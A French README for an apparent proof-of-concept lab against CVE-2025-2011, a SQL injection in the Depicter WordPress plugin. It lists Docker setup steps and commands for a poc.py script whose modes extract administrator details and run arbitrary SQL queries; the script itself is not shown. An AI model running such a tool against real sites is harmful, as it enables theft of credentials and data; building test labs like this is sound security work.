
PoC pour CVE-2025-2011 - Injection SQL dans le plugin Depicter <= 3.6.1
Référence CVE : CVE-2025-2011
Ce dépôt contient un environnement de preuve de concept pour tester la vulnérabilité d'injection SQL dans le plugin Depicter Slider & Popup Builder (versions < 3.6.2).
requests, coloramaDémarrer l'environnement
docker-compose up -d
Terminer l'installation de WordPress
http://localhost:5555Installer le plugin vulnérable
chmod +x install-plugin.sh
./install-plugin.sh
Ce script va :
Installer les dépendances Python
pip install requests colorama
Le script PoC (poc.py) peut être utilisé pour tester la vulnérabilité dans différents modes :
Vérifier si la cible est vulnérable
python poc.py -u http://localhost:5555
Extraire les détails de l'administrateur
python poc.py -u http://localhost:5555 -m admin
Exécuter une requête SQL personnalisée
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Activer la sortie de débogage
python poc.py -u http://localhost:5555 -d
Pour arrêter et supprimer l'environnement :
docker-compose down -v
Cet environnement est fourni uniquement à des fins éducatives et de test. Ne l'utilisez pas contre des systèmes sans autorisation explicite.